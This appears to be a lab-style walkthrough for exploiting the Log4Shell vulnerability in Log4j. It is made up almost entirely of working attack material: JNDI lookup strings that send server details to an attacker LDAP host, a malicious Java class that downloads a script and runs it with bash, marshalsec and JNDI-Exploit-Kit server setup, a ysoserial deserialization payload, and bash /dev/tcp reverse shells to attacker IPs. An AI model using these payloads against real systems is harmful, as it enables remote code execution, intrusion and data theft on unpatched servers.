Log4Shell Exploitation Guide

Enumerate Log4Shell

Use Wireshark to catch the information (Follow > TCP Stream)

#Enumerate the server information
${jndi:ldap://10.10.14.6:1389/${sys:java.class.path}}
${jndi:ldap://10.10.14.6:1389/${java:version}}
${jndi:ldap://10.10.14.6:1389/${java:os}}
${jndi:ldap://10.10.14.6:1389/${env:myenv}}

Method #1 Manual Way

Install Dependencies

sudo apt install maven openjdk-17-jdk -y

Creating the Malicious Java Class

RCE.java

public class RCE {
    static {
        try {
            Runtime r = Runtime.getRuntime();
            Process p = r.exec("wget http://KALIIP/x -O /tmp/x");
            p.waitFor();
            r = Runtime.getRuntime();
            p = r.exec("/bin/bash /tmp/x");
            p.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
    
    public RCE() {
        System.out.println("Is this RCE?");
    }
}

Compile the Payload

#Note: Compile with vulnerable application version
javac -source 1.8 -target 1.8 RCE.java

Setting Up the JNDI Exploit Server

Clone and Build marshalsec

git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn package -DskipTests

Start the LDAP Server

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://KALIIP:8888/#RCE"

Reverse Shell Payload

Create a file X with the following payload:

bash -i >& /dev/tcp/KALIIP/1234 0>&1

Exploiting Log4Shell

Send the malicious JNDI lookup string:

${jndi:ldap://10.8.5.48:1389/a}

Notes

• Replace KALIIP with your attacker's machine IP.

• Ensure the target application is vulnerable to Log4Shell (e.g., using Log4j versions ≤ 2.14.1).

• The payload downloads and executes a remote shell script to establish a reverse shell.

Example:

Got Reverse Shell

Method #2 ysoserial-modified

GitHub - pimps/ysoserial-modified: That repository contains my updates to the well know java deserialization exploitation tool ysoserial.GitHub

GitHub - pimps/JNDI-Exploit-Kit: JNDI-Exploitation-Kit（A modified version of the great JNDI-Injection-Exploit created by @welk1n. This tool can be used to start an HTTP Server, RMI Server and LDAP Server to exploit java web apps vulnerable to JNDI Injection）GitHub

#Clone Repository
git clone https://github.com/pimps/ysoserial-modified
cd ysoserial-modified/target

#Craft Payload
java -jar ysoserial-modified.jar CommonsCollections5 bash 'bash -i >& /dev/tcp/10.10.15.157/1234 0>&1' > payload.cc5

#Clone Repository
git clone https://github.com/pimps/JNDI-Exploit-Kit.git
cd JNDI-Exploit-Kit/target
#Start the server
java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -L <attackerIP>:1389 -P payload.cc5

#Create a listener to Reverse Shell
nc -lvp <port>

#Send the malicious JNDI lookup string (Based on Vulnerable application java version)
${jndi:ldap://10.8.5.48:1389/xxxxx}